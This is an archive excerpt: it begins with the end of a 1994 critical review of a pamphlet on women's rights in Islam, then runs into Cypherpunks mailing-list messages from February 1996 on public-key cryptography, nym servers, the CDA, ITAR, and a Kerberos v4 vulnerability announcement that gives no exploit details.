     in the Islamic Law, nor could anyone  dare to cancel,
     reduce,  or  distort the  clear-cut  legal  rights of
     women given in Islamic Law.  (p.23)

Taken in  their  ordinary, natural  meaning,  these claims  are
false, and are easily demonstrated to be false.

Let  us first  examine Dr  Badawi's use  of  the term  "Islamic
Law".   This  is not, as  some of his readers  might suppose, a
single,  unambiguous body of law - such as  can be found in the
_Code Napoleon_, or even, if with considerable training, in the
English common  law. It is  derived from  many sources.   First
there  is the Koran, which is a long  and not always clear text
allegedly  dictated  to  Mohammed  by  the  Archangel  Gabriel.
Second there are the _hadith_, which are the  traditional stories
of what  Mohammed said  and did  on various  occasions.   Since
there  are  nearly   two  million  of  these,  and  they  often
contradict one  another, there has been  much room for  dispute
as to their collective meaning.  Third,  there is the _ijima_, or
the  consensus of opinion among learned Moslems.  Fourth, there
is _qiyas_,  this being  a  process  of analogical  reasoning  by
which,  in  the absence  of any  other rule,  a case  is  to be
decided in a manner consistent with the existing body of law.

This aside,  Islam has over  the centuries   divided into  many
sects,  each with  its own  doctrinal emphases  and accretions.
It is therefore  quite impossible - except on the  most obvious
sectarian  grounds  - to  claim  the  existence of  any  single
Islamic  Law, or  any "clear-cut  legal rights"  held under it.
This allows  Dr Badawi to  sweep aside  many objections to  his
argument based on actual practice in Islamic societies.   Or so
it  would  were  he  only  to  admit  the  existence  of  these
practices.   He  says nothing  of female  circumcision, or  the
selling  of  brides, or  the  power  of life  and  death  often
possessed -  and often  exercised -  by Moslem  men over  their
womenfolk.   He does, however, allude  to them in the  expected
manner:

     It is... a  fact that  during the  downward cycle  of
     Islamic  Civilisation, [Islamic]  teachings were  not
     adhered to by many people who profess  to be Muslims.
     (p.23)

Yet  even  if  we follow  Dr  Badawi's  advice,  to  "make  any
original   and  unbiased   study  of   the  sources   of  these
teachings", we find  much that falls short of what  is normally
meant by  equality -  and much  that is  at least  inconsistent
with his claims.

Take,  for  example, marriage.    Here,  Dr Badawi  contradicts
himself.  He claims that husbands and wives  "have equal rights
and claims  on one another". (p.16)   He immediately adds  that
husbands have  the  exclusive  "responsibility" of  leadership.
His  biological  justification for  this  is  irrelevant -  and
would  remain so  were  it  true.   An equality  of  rights and
claims, plus  leadership!  There  is a  twisting of words  that
Hewlett Johnson himself might not have dared make so crudely.

Turning  to divorce,  Dr Badawi  makes no  explicit claim,  but
uses a  form of words that implies an equality of rights.  This
is   not  an   equality  recognised   by  any   Islamic  jurist
uninfluenced by  Western legal concepts.   The  general outline
of  Islamic divorce law -  an outline more or  less accepted by
all jurists  before this century -  was summarised thus by  the
Privy Council in 1861:

     It appears that by the  Mohammedan law divorce may be
     made in either of two forms:  _Talak_ or _Khoola_.

     A divorce by  _Talak_ is the mere arbitrary act  of the
     husband, who  may  repudiate  his  wife  at  his  own
     pleasure.  But if he adopts that course  he is liable
     to  repay her  dowry, or _dyn-mohr_, and,  as it seems,
     to give up any jewels  or paraphernalia belonging  to
     her.

     A divorce  by _Khoola_ is a  divorce with the  consent,
     and at the instance, of the wife, in  which she gives
     or  agrees to give a consideration to the husband for
     her release  from the marriage tie.   In such a  case
     the terms of the bargain  are a matter of arrangement
     between the  husband and wife, and  the wife may,  as
     the  consideration, release  her _dyn-mohr_  and  other
     rights, or make any other  agreement for the  benefit
     of the husband.^1 

A  man can  divorce his wife  at any time, without  consent.  A
woman  must negotiate  and then  often buy  her  way out  of an
unsuitable marriage.  Again, some equality!^2 

But Dr Badawi goes  further.  He appeals to  the Koran.   This,
he says, provides

     clear cut evidence  that woman is  completely equated
     with man in the  sight of God in terms of  her rights
     and responsibilities. (p.13)

I have  not space to  quote his  appeals to  the Koran on  this
point:   my readers  may find  them in  chapters 74:38,  3:195,
4:124, 2:36, 7:24-24,  and 20:121.  Anyone who reads  them will
find nothing  of any  substance.   I will instead  make my  own
appeal, quoting chapter 24:31:

     And  say  to the  believing  women  that they  should
     lower their gaze and guard  their modesty; that  they
     should  not display their beauty and ornaments except
     what  (must  ordinarily) appear  thereof;  that  they
     should  draw their  veils over  their bosoms  and not
     display their beauty except to their  husbands, their
     fathers, their  husbands' fathers, their sons,  their
     husbands'  sons,  their brothers  or their  brothers'
     sons, or their sisters'  sons, or their women, or the
     slaves  whom  their  right  hands  possess,  or  male
     servants free  of any  physical needs (ie,  eunuchs),
     or small children  who have no sense of the  shame of
     sex; and  that they should  not strike  their feet in
     order to draw attention to their hidden ornaments.^3 

Let us  ignore  that if  this  is the  direct Word  of God,  it
sanctions slavery  and involuntary castration.  I will only say
that it has been used, together  with other verses of the  same
kind, to justify  at least the economic oppression of  women in
traditional  Islamic  societies.     It  limits  the  range  of
employments open  to them  - partly  by imposing  a dress  code
incompatible  with many  occupations, and  partly by forbidding
contact with any man not related to them.

Turning to  formal equality before  the law, take chapter 4:15-
16:

     If any  of your  women are guilty  of lewdness,  take
     the  evidence  of  four  (reliable)  witnesses   from
     amongst  you against  them; and  if they  do testify,
     confine them to  houses until death do claim them, or
     God ordain for them some (other) way.

     If two men  among you are  guilty of lewdness, punish
     them  both.   If they  repent  and amend,  leave them
     alone; for God is Oft-returning, Most Merciful.

The  commentary here  leaves it  open whether  "lewdness" means
simple   fornication  or  homosexual  intercourse.     But  the
procedural  meaning  is   plain.    Men   can  get   away  with
repentance:   women are shut away  for life unless God  himself
comes down to say otherwise.

There is much more that  I could say.   A reading of the  Koran
is most enlightening -  though not in any sense that  Dr Badawi
might hope.  But  I have said enough.   Under Islam, women  are
most  emphatically  not  equal  to  men.   Certainly,  men  are
repeatedly encouraged  to treat  women with more  consideration
than seems to have been usual in Arabia  before Mohammed became
its ruler.  But this consideration falls short  of the equality
that Dr Badawi insists is the case.

In passing, I  will draw attention to Dr Badawi's  ignorance of
Western history and culture.  He claims. for example, that

     In England over  nine million women were burned alive
     in the 16th century. (p.5)

In reply,  I quote from  a letter  to Dr  Badawi written by  my
friend Judith Hatton:

     The total population  of Britain (not England  alone)
     was  2.5  million in  1500, and  about  5  million in
     1650.  Parish records show that there  was an average
     annual  mortality  rate  of  55,000, which  of course
     includes men,  women  and children.    To reach  your
     figure 90 thousand women alone would  have had to  be
     executed  annually,  without  consideration   of  any
     normal deaths.

That, I think, answers this claim.  Let us move to another:

     Even  in  modern times,  and  in  the most  developed
     countries,  it  is  rare  to  find  a  woman  in  the
     position of  a head of  state acting  as more than  a
     figurehead....  (p.22)

What about  Mary I and  Elizabeth I of  England?  Catherine  de
Medici  of France?   Christina  of Sweden?    Maria Theresa  of
Austria?   Anne and  Catherine of  Russia?   What of  all those
other European women  who enjoyed something like supreme power,
though only  informally?  And, against  this, how many  Islamic
countries  have  been  ruled  by  a Queen,  or  have  tolerated
anything approaching "petticoat"  government?   The only  Queen
who  immediately comes  to  mind as  the  ruler of  an  Islamic
country was Queen Victoria, Empress of India!

Again, take this:

     In the 17th century, the clergy in  Rome decided that
     women  had  no soul  and  would  therefore not  enter
     paradise.

But this is  a claim too laughable to  merit reply.  I only ask
Dr Badawi to produce a source to justify  it.  I am in no hurry
to receive  it, though:  let  him first become better  informed
about his own religion before he starts investigating another.

Now,  I suppose  I  should conclude  with a  general  statement
about Islam.  If  my tone in the above  may sound contemptuous,
it is not because I hold  Islam in contempt or fear.   I do not
share the view  of the remaining  Cold War cranks  in the  Tory
Party  that it is  the Next Great Enemy  of Apple Pie that must
be beaten down by  the same means that kept  so many people  in
agreeable jobs before  1989.  It is not a  necessarily barbaric
religion.   It enjoins many things  that are of enduring  value
and prohibits  or discourages many  things that  are bad.   The
Old Testament has  texts quite as savage  as those to be  found
in  the  Koran; and  both Judaism  and Christianity  have their
grim old men with beards who mutter these  texts whenever there
is  someone else  around trying  to have  fun  or do  something
generous.   Nevertheless, in Islam,  the old  men are still  in
charge.  That is the problem.

I dislike Dr Badawi's pamphlet and everything else  that I have
read  produced by  the IPCI.    But I  am  glad  that they  are
produced  in English  and  made  so freely  available  to  non-
believers.   Here is an  invitation to debate.   By  joining in
that  debate, and  winning it,  we  can do  far more  than  any
number  of  Gulf   War  massacres  to  bring  on  the  internal
reformation that  Islam so plainly  needs before  it can  stand
usefully beside the two other great monotheistic religions.

*Marian Halcombe*

Notes

1.   _Moonshee  Buzul-ul  Raheem  v  Luteefut-oon-Nissa_  (1861),
cited  in Asaf A.A.  Fyzee, _Outlines  of Muhammedan Law_, Oxford
University Press,  New Delhi, 1974,  p. 164.   The practice  of
the authorities in British India was to  let each group, so far
as  possible, live  under its  own customary or  religious law.
In deciding this case, the judges at first  instance would have
taken the  advice  of the  most  authoritative Islamic  jurists
available.  That  this summary is  a good  one is indicated  by
its having been cited by Mr Fyzee.

2.   Divorce  by  _Talak_   is  still  allowed  in  some  Islamic
jurisdictions, and there have been Moslem  men settled in  this
country who have tried  - of course, without success  - to have
it recognised in the English courts.  I will not  cite the many
cases:   my readers may  find them discussed at  some length in
David  Pearl, _A  Textbook of  Muslim  Law_ (2nd  edition), Croom
Helm, London, 1987.

3.   I  quote  here  and  below   from  the  translation   with
commentary by Abdullah Yusuf Ali, also published by the IPCI.


*Editor's note*

Though priced at   1.05, Dr Badawi's  pamphlet and  many others
like  it  are  available  free  of  charge   from  the  Islamic
Propagation  Centre International  (UK)  at 481  Coventry Road,
Birmingham, B10 0JS, Tel: 021 773 0137, fax:  021 766 8577.

The translation of the Koran used by Mrs  Halcombe is available
from  the same  address  at  the greatly  subsidised  price  of
Pounds 7.50, plus  Pounds 3.50 p&p.

Any  reply   to  Mrs  Halcombe's   review  will   be  seriously
considered  for publication.   It  should address  her specific
points and not be too long.

*Note for this uploading

A copy of this review was sent to the IPCI in August 1994.  I received
a brief acknowledgment, but am still waiting for any kind of refutation.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Tue, 20 Feb 1996 15:08:22 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.) [HUMOR]
Message-ID: <199602200523.AAA15480@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hey! These guys may be onto something after all...We can't decrypt
what they can't spell. ;)
JMR


Regards, Jim Ray <liberty@gate.net>
Boycott espionage-enabled software! [It's evidently proliferating.]

"If I had to summarize [Republican candidate Morry] Taylor's campaign
 message, I'd boil it down to two basic points:
1. The problem with this country is that the government is run by lawyers.
2. And these are *stupid* lawyers."  --  Dave Barry 2/17/96
_______________________________________________________________________
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Public Key id. #  E9BD6D35  http://www.shopmiami.com/prs/jimray IANAL
_______________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMSlaR21lp8bpvW01AQF1WgP8C2fWGAY5o9hY9zt4lMKUa3AzfmqSua8E
l1VmYMH9hOak4EspWYMwPSdl1EtVWPK7bFSQHES//XmTQl6gqLl7lUx+YHUrwnNV
+Z1jkdUH/VanpK+ZXW0moq7aOQqn3KlJKkUIR0R6ynDBdsVwjZTGROmKYA/StygV
rDAj8bcU6rE=
=EtaV
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Tue, 20 Feb 1996 17:18:48 +0800
To: cypherpunks@toad.com
Subject: Re: Compelling Advantage of Public Key Systems
Message-ID: <2.2.32.19960220082955.00691914@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:58 AM 2/20/96 -0800, tcmay@got.net (Timothy C. May) wrote:

>To wit: public key systems drastically simplify the whole key exchange problem.

Exactly. I was trying (not very successfully, I fear) to explain this point
just this afternoon to an acquaintance who's developed a handy-to-use but
not at all really secure encryption utility. Quite apart from the issue of
key size, the public-key system means that I never have to have a secure
channel to start communicating. If I've got a channel secure enough to send
a clear password to you, I don't need the encryption for security reasons.
(_Economic_ reasons may well be valid ones, in practice, but again, if a
secure channel isn't routinely available, I say go for the tool that doesn't
require it.)

I find that it generally takes a few repetitions of this for it to sink in,
but once it does, an "aha!" usually follows.

-- 
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Tue, 20 Feb 1996 17:19:25 +0800
To: cypherpunks@toad.com
Subject: Re: should we use same nym on multiple servers?
Message-ID: <2.2.32.19960220082958.00691804@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:05 AM 2/20/96 -0800, tcmay@got.net (Timothy C. May) wrote:

>You know, shalmaneser@alpha.c2.org sent me a message demanding that he be
>given the name shalmaser@black.net on my system, for exactly this reason.
>I told him to fuck off.
>Now he's threatening to sue me. Do you folks think this is right?

No fooling? Wow. That's astonishingly clueless on his part, I'd say. 

When I sign up with an Internet provider, I don't necessarily get the user
name I want. When I joined Teleport, "bruce", "baugh", and "bbaugh" were all
already taken. I presume by, in turn, someone with the first name of Bruce,
someone with the last name of Baugh, and someone with a first initial of B
and a last name of Baugh. (There are, oh, third or fourth cousins of mine in
the area. These things happen.) When I transferred to Aracnet, "bruce" was
free, so I grabbed it. If Bruce Boxleitner were to try to get an account
there, that'd be his tough luck.

Even more so with nyms, and even more more so with nyms that aren't real
names. "Shalmaneser" is a name with antecedents, after all. If someone else
beat the c2 guy to it at black.net, that's his tough luck. No provider, I
think, is compelled to offer anyone the user name they might like to have,
nor to hold one indefinitely on the off chance. Welcome to the real world,
where more than one person can have the same idea.

And, as you say...

>about "claims" on nyms, it's pointless. Even if _some_ nyms are apparently
>persistent across nymservers, all it takes is the possibility of this not
>to be so for the fiction to collapse. The best way to prove that
>"shalmaneser@alpha.c2.org" is really the same True Name (or in alliance
>with) as "foobar@black.net" is to show that either can read the messages
>encrypted to the other.)

Right. It at least shows some level of cooperation, if not identity. And
realistically, that's about as close as anyone is going to get.

-- 
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 20 Feb 1996 16:17:13 +0800
To: cypherpunks@toad.com
Subject: Compelling Advantage of Public Key Systems
Message-ID: <ad4eb80109021004fceb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



This is a really, really basic point, but it seems to be lost by some of
the folks talking about "virtual one-time pads," "power one-time pads," and
"visual power agents one-time pads."

To wit: public key systems drastically simplify the whole key exchange problem.

Thus, I can send an encrypted message to any of you for whom I have a
public key, or can easily get a public key for, and then only the holder of
the private key can decrypt. (There are the usual wrinkles about whether
the public key is really that of the person you think it is for, MITM,
etc., but these are true of any system, and in practice present little
problem.)

Any schemes which use symmetric key systems, including one time pads, must
of necessity involve prior arrangement to exchange keying materials.
Nothing can get around this.

The "revolution in cryptography" comes from this basic feature of public
key cryptosystems. Period.

I suggest we not waste our time on the "IPG" system. Whether it is secure
or not is not the point. It's cumbersomeness and its $15 a month for some
nominally random-looking bits (though known to IPG, so what's the point?)
will kill it dead.

Let those who use it be examples of evolution in action.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 20 Feb 1996 16:25:38 +0800
To: cypherpunks@toad.com
Subject: Re: should we use same nym on multiple servers?
Message-ID: <ad4eba2f0a0210047fe2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:45 AM 2/20/96, Anonymous wrote:
>  With the additional nym servers coming on the scene comes the
>question of whether or not to "claim" our alpha.c2 nym on the other
>ones, too.  E.g., if we are foobar@alpha.c2.org, should we also become
>foobar@nym.gondolin.org and foobar@nym.alias.net, too?

You know, shalmaneser@alpha.c2.org sent me a message demanding that he be
given the name shalmaser@black.net on my system, for exactly this reason.

I told him to fuck off.

Now he's threatening to sue me. Do you folks think this is right?

(More to the point, this example shows that whatever "anonymous" thinks
about "claims" on nyms, it's pointless. Even if _some_ nyms are apparently
persistent across nymservers, all it takes is the possibility of this not
to be so for the fiction to collapse. The best way to prove that
"shalmaneser@alpha.c2.org" is really the same True Name (or in alliance
with) as "foobar@black.net" is to show that either can read the messages
encrypted to the other.)


--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 20 Feb 1996 15:46:53 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Prosecutor Violates CDA--Film at Eleven
In-Reply-To: <ad4e8ae4060210046373@[205.199.118.202]>
Message-ID: <Pine.BSF.3.91.960220010933.21991G-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 19 Feb 1996, Timothy C. May wrote:

> At 3:12 AM 2/20/96, Brian Davis wrote:
> >On Mon, 19 Feb 1996, jim bell wrote:
> >
> >> it just didn't occur to me that you'd object to this.  "Nettiquette" is new
> >> to me.                                                  ^^^^^^^^^^^^^^^^^^ >
> >  ^^^^^^
> >
> >No shit.
> 
> 
> Brian,
> 
> While I agree with your point of view, I must inform you that your word is
> one of the "Seven Dirty Words" and that you have thus violated the
> Communications Decency Act. There are several self-admitted minors
> (including several high school students) subscribed to the Cypherpunks
> list, so use of such indecent language as the above is a violation of the
> CDA on the face of it.
> 
> I presume you will not be allowed to prosecute yourself.

Fuck.  I've been caught!  But I granted myself immunity.  So piss on 
them.

Besides, it is almost 1:00 a.m. and all kids are asleep!

> 
> 
> --Tim May
> 

EBD

> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Tue, 20 Feb 1996 17:19:45 +0800
To: cypherpunks@toad.com
Subject: Re: should we use same nym on multiple servers?
In-Reply-To: <199602200645.HAA00901@utopia.hacktic.nl>
Message-ID: <199602200823.BAA00562@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>   With the additional nym servers coming on the scene comes the 
> question of whether or not to "claim" our alpha.c2 nym on the other 
> ones, too.  E.g., if we are foobar@alpha.c2.org, should we also become 
> foobar@nym.gondolin.org and foobar@nym.alias.net, too?

*shrug* sounds good

> an oversimplified scenario would be if an attacker sends a message to 
> all three nyms, then watches three PGP conventionally encrypted 
> messages arrive in our mailbox.)
> 
>   A "safer" way would be to have the other two nyms have a fake 
> address, but then we couldn't receive mail with it.  A trickier way 
> would be to have the reply block point to alt.anonymous, but then we'd 

Traffic analysis can happen even with only one address. (just spam attack
the one, or whatever)

You can protect yourself somewhat by putting lots of latency into your reply
block, including random. You could have one nym point to another.

ObMindWandering
Since expiration dates were "supposed" to be added to type I, and there's at
least some spam-detection code, why not add "Hi, I'm reply block #XYZ. Watch
for spam attacks from me." warnings inside the reply block. (To be lost on
the next hop, of course)

If good spam-detection code ever catches on in type I, it would be nice to be
able to trigger it yourself. 

ObSnakeOil: Post your source code or go away, you're wasting bandwidth.

ObNoiseInGeneral: skipping it in leaps and bounds. MUCH quieter. =)
- -- 
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://students.cs.byu.edu/~don   or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Junk mail to root@fryser.dk.net
* This user insured by the Smith, Wesson, & Zimmermann insurance company *

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMSmE/cLa+QKZS485AQHbigL+Ja1krN2TUFyR+aFR6C0wI5zj4160Iz0q
0tLKSA7X+px+lUwCLdRuEk4wskcNhXFP5ESpCxpQKw2CZRjNlJ4vZA54wE9PBlxf
ibR4ZpktxfFsYr+rkdwt0JWUj/+65d6P
=Pwji
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nelson Minar <nelson@santafe.edu>
Date: Tue, 20 Feb 1996 17:20:53 +0800
To: cypherpunks@toad.com
Subject: breakable session keys in Kerberos v4
Message-ID: <199602200828.BAA21074@nelson.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain


I'm a bit suprised this hasn't turned up yet on Cypherpunks.  A couple
of forwarded messages: first, an announcement made Fri Feb 16 by Gene
Spafford at COAST about an exploitable flaw they've found in Kerberos,
and then a comment on the www-security list that it is due to a bad
random number generator. Same old story!

The message (lifted from the COAST web site)
-----BEGIN PGP SIGNED MESSAGE-----

Personnel at the COAST Laboratory (Computer Operations, Audit, and
Security Technology) at Purdue University have discovered a
vulnerability in current versions of the Kerberos security system.
Graduate students Steve Lodin and Bryn Dole, working with Professor
Eugene Spafford, have discovered a method whereby someone without
privileged access to most implementations of a Kerberos 4 server can
nonetheless break secret session keys issued to users.  This means that
it is possible to gain unauthorized access to distributed services
available to a user without knowing that user's password. This method
has been demonstrated to work in under 1 minute, on average, using a
typical workstation, and sometimes as quickly as 1/5 second.

The Kerberos system was developed at MIT in the mid-1980s, and has
been widely adopted for security in distributed systems worldwide.
Kerberos is most often used on UNIX platforms by various vendors, and
is often enhanced, sold and supported by 3rd-party vendors for use in
academic, government, and commercial environments.

The same researchers at COAST have also found a small, theoretical
weakness in Kerberos version 5 that would allow similar access, given
some additional information and considerable preliminary computation.
Kerberos version 5 does not exhibit the same weakness as described
above for Kerberos version 4.

The researchers at COAST had intended to release the specific details
of the problem to affected vendors and incident response teams during
the week of February 19, prior to making a public announcement of
their findings.  However, as rumors have begun to circulate and
several representatives of the news media have apparently received
indication of the problem, we are releasing this preliminary
announcement at this time.

Government and industry sponsors of the COAST Laboratory were made
aware of the preliminary details of these findings in January (full
sponsors receive early notification of significant discoveries as a
result of COAST research).  Other affiliates of COAST as well as the
world-wide network of FIRST computer incident response teams were made
aware of the general nature of the findings during the week of
February 5.  The original plan at COAST was to release specific
details only to FIRST (Forum of Incident Response and Security Teams)
teams and to MIT prior to announcement by affected vendors of a fix
for these weaknesses.  The flaw in Kerberos version 4 is significant
enough that disclosure of its details prior to a fix would allow
someone with moderate programming skills to exploit it; there is
currently no reason to believe that others know the details of the
flaw and are exploiting it, so there is no immediate danger to the
public that would warrant release of the details at this time.

COAST personnel have been informed that MIT has already developed a
fix for the flaw in version 4 Kerberos and is preparing it for
release.  Additionally, COAST researchers are cooperating with MIT
personnel to identify what (if any) fixes are necessary for version 5
Kerberos. Users of either version of Kerberos should contact their
vendors for details of any fixes that may be made available; vendors
of products incorporating Kerberos should contact MIT directly for
details of the problems and fixes.

COAST is a research group of faculty and students dedicated to
research into information security and computer crime investigation,
and education in computer and network security.  It is the largest
such university-based group in the United States.

Information on COAST may be found on the WWW at
  http://www.cs.purdue.edu/coast
Information on FIRST teams may be found on the WWW at
  http://www.first.org
Information on MIT's Kerberos may be found on the WWW at
  ftp://athena-dist.mit.edu/pub/kerberos/doc/KERBEROS.FAQ

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Key @ ftp://ftp.cs.purdue.edu/pub/spaf/pers/pgpkey.asc

iQCVAwUBMSZ42cpvK4P8DALVAQHg8QP/TRmqwP7vG32aaBjvbMof2iuVQ2bcWrg9
p55KN5wBfrBzxq5/NE+6lodkqq2w1ib8q/47uYT1S8iR+z2tnbvL64dxrtDEh4iY
iEWjfpTMtQxLmZ1gA3Sxxn4A+6KwlXq5z4Lp2BROUXyeSR7HPAEeEQucRNWkzz8o
IOMHuBAcBKo=
=yWxe
-----END PGP SIGNATURE-----

(a comment I found in reply)

------- Start of forwarded message -------
From: jis@mit.edu (Jeffrey I. Schiller)
Subject: Re: Kerberos Vulnerability
Newsgroups: hks.lists.www-security
Date: 19 Feb 1996 21:42:08 -0500
Organization: HKS, Inc.
Path: hks.net!news-mail-gateway!owner-www-security
Lines: 8
Sender: root@hks.net
Message-ID: <ad4e9fc40602100421be@[18.162.1.1]>
NNTP-Posting-Host: bb.hks.net

There will be a fix distributed by MIT later this week. The problem is that
the random number generator in V4 is worse then we thought! The fix is to
retrofit the V5 generator (which is decent) into the V4 KDC. Note: Only the
KDC needs to be updated, clients and servers are unaffected.

                                -Jeff


------- End of forwarded message -------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Tue, 20 Feb 1996 16:46:48 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960219194257.5326J@citrine.cyberstation.net>
Message-ID: <Pine.3.89.9602200232.A25104-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 19 Feb 1996, IPG Sales wrote:

> Perry
> 
> Yes you are quite right - time will tell and it is you that is wrong - as 
> time will prove - it will be my pleasure to have you eventually choke on 
> your castigating words - to castigate be sure that you are right, and in 
> this case, you are wrong as time will tell - wait and see -!!!!!!

As much as I dislike Perry's strutting on CP, I dislike even more folks
who dream up some hair-brained scheme, then claim it's the greatest thing
since sliced bread, without so much as anything approaching peer review,
and are obviously out to make a quick buck when they take the company
public.  I hate to say it in public, but Perry's 100% correct.

Especially ones who end their rants with multiple exclamation marks.  The
more exclamation marks I see, the faster the message gets thrown in the
trash. 
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 20 Feb 1996 19:22:34 +0800
To: Sean Morgan <sean@lucifer.com>
Subject: Re: CDA outside US (Including Indian Reservations)
Message-ID: <199602201045.CAA13729@ix16.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:21 PM 2/18/96 -0700, Sean Morgan wrote:
>This is not an idle threat.  When Pierre Trudeau was elected prime minister
>of Canada (1969?) there was some scrambling in the US to get him off the
>_persona non grata_ list.  Seems that in his student days he had been busted
>for trying to kayak from Florida to Cuba.  Canadian author Farley Mowatt
>(sp?) was turned back at the border for imagined pinko associations (best
>guess was that it was because he had traveled to the USSR to research _Sibir_).

Farley Mowat (author of such pinko-Canadian books as "Never Cry Wolf")
had also "violently attacked" the US Air Force.  He was annoyed at them for
flying
nuclear bombers and such on training runs over Canada, and shot at them
with a small rifle (I think it was a .22 or something equally dangerous to
airplanes at 35000 feet...)  They didn't like it.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281

! Frank Zappa for President !





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 20 Feb 1996 19:27:13 +0800
To: cypherpunks@toad.com
Subject: Re: ITAR Amended to Allow Personal Use Exemptions
Message-ID: <199602201046.CAA13736@ix16.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:28 PM 2/16/96 -0500, Adam Shostack <adam@homeport.org> wrote:
>Since we don't need a license, what records are we supposed to keep?

>| The product must
>| not be intended for copying, demonstration, marketing, sale, re-export,
>| or transfer of ownership or control.  It must remain in the possession
>| of the exporting person, which includes being locked in a hotel room or
safe. 

So does wearing the RSA T-shirt count as "demonstration"?  Or would you have
to show people how the perl code works?  Or are you still not allowed to
let foreigners see it, even though you're allowed to wear it?

I suppose wearing the T-shirt _to_ a demonstration would be illegal?  :-)

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281

! Frank Zappa for President !





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 20 Feb 1996 19:27:37 +0800
To: cypherpunks@toad.com
Subject: Re: PGP
Message-ID: <199602201046.CAA13739@ix16.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 PM 2/15/96 EST, Derek Atkins <warlord@ATHENA.MIT.EDU> wrote:
>>       Could you settle a dispute?  Is it, or Is it not, legal to take 
>> PGP source code and the like out of the country if it is written on 
>> paper?
>
>This is a leading question.  If you just print it out, it might not be
>legal to export.  If it is printed in a book (e.g., the PGP Sourcecode
>Book, MIT Press, 1995) then it should be legal to take it out of the
>country.  IANAL, YMMV.

